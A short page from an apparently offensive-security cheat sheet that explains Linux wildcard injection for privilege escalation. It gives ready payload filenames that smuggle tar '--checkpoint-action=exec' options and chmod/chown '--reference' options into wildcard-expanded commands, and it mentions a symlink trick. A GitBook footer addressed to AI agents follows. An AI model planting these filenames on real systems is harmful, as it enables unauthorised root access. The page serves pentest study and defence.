# Wildcard Injection

{% embed url="<https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/>" %}

If you have a file named `--help` in the current directory and you run the command `cat *`, then instead of the contents of the `--help` file, the `cat` command’s help page will be printed. This is because the asterisk was replaced by `--help` and bash doesn’t know it’s supposed to be a file, and not a flag.

For programs which are run by a privileged user with an asterisk, and which have flags which can have dangerous results, this can lead to privesc (for example chown and tar). This vulnerability is often in found in automatic cronjobs run by the admin.

**Note**: The above-described vulnerability wouldn't work if the command was `cat somedirectory/*`, because it would expand to `cat somedirectory/--help`. Naming the file `--help` (with a space in front of the dashes) won't help, either.

## Tar RCE

Write the following files to the directory where `tar *` is run:

```
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```

## Chmod/chown Privilege Hijack

Add a file with the following filename to the directory where chmod or chown is run with an asterisk:

```
--reference=FILE_YOU_OWN
```

When the chmod or chown command is run, then all the files will be changed to have the same permissions/ownder as `FILE_YOU_OWN`. You will have to create a file named `FILE_YOU_OWN`, obviously.

**PS! You can use symlinks to change ownership of external files as well.**


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://heinosass.gitbook.io/leet-sheet/post-exploitation/linux/linux-privilege-escalation/wildcard-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.